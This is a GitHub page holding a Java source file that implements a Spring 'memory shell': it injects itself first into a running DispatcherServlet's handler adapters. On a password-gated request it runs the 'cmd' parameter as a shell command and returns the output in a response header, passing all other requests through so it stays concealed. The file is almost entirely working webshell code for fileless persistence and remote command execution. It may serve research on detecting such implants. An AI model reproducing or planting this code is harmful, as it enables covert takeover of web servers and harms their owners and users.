Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

Latest commit

 

History

History
History
75 lines (64 loc) · 3.1 KB

File metadata and controls

75 lines (64 loc) · 3.1 KB
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
package com.example.springshell.memshell;
import com.example.springshell.utils.Util;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import org.springframework.web.servlet.DispatcherServlet;
import org.springframework.web.servlet.HandlerAdapter;
import org.springframework.web.servlet.ModelAndView;
import java.io.InputStream;
import java.util.List;
import java.util.Scanner;
public class No8_HandlerAdapterShell implements HandlerAdapter {
List<HandlerAdapter> handlerAdapters;
public No8_HandlerAdapterShell(List<HandlerAdapter> handlerAdapters) {
this.handlerAdapters = handlerAdapters;
}
public static String injectShell() throws Exception{
DispatcherServlet servlet = new Util().getServlet();
List<HandlerAdapter> handlerAdapters = (List<HandlerAdapter>) Util.getFieldValue(servlet,"handlerAdapters");
handlerAdapters.add(0,new No8_HandlerAdapterShell(handlerAdapters));
return "{\"result\":\"No8_HandlerAdapterShell\"}";
}
@Override
public boolean supports(Object handler) {
return true;
}
@Override
public ModelAndView handle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
String passwd = request.getParameter("pass");
String cmd = request.getParameter("cmd");
if (passwd!=null && cmd!=null && passwd.equals("shell8") && !cmd.isEmpty()){
boolean islinux = true;
String osType = System.getProperty("os.name");
if (osType !=null && osType.toLowerCase().contains("win")){
islinux = false;
}
String[] cmds = islinux ? new String[]{"sh","-c",request.getParameter("cmd")} : new String[]{"cmd.exe","/c",request.getParameter("cmd")};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
// response.getWriter().write(output);
// response.getWriter().flush();
// response.getWriter().close();
response.setHeader("Exec-result", new String(output));
return null;
}
// 重新找到适配的handlerAdpapter,相当于做了一层代理??
for(HandlerAdapter handlerAdapter:this.handlerAdapters){
if(!(handlerAdapter instanceof No8_HandlerAdapterShell) && handlerAdapter.supports(handler)){
return handlerAdapter.handle(request,response,handler);
}
}
return null;
}
// 模仿SimpleControllerHandlerAdapter的getLastModified方法
@Override
public long getLastModified(HttpServletRequest request, Object handler) {
for(HandlerAdapter handlerAdapter:this.handlerAdapters){
if(!(handlerAdapter instanceof No8_HandlerAdapterShell) && handlerAdapter.supports(handler)){
return handlerAdapter.getLastModified(request,handler);
}
}
return 0;
}
}
Morty Proxy This is a proxified and sanitized view of the page, visit original site.